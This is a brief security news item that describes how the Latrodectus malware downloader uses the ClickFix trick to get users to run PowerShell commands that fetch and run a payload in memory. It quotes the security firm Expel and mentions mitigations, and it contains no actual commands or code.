Latrodectus, a new malware variant that serves as a downloader for other malicious payloads, employs a technique called ClickFix to infiltrate systems stealthily. This technique executes malware directly in memory without writing files to disk, making detection by security tools more challenging. It exploits user behavior by tricking them into executing PowerShell commands from compromised websites. Additionally, Latrodectus was affected by global security efforts that dismantled several related malware infrastructures. Mitigation strategies include disabling specific Windows features to prevent such attacks.
"The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News.
"When run by a user, these commands will attempt to install a file located at the remote URL using MSIExec, and then execute it in memory," Expel said.
Collection
[
|
...
]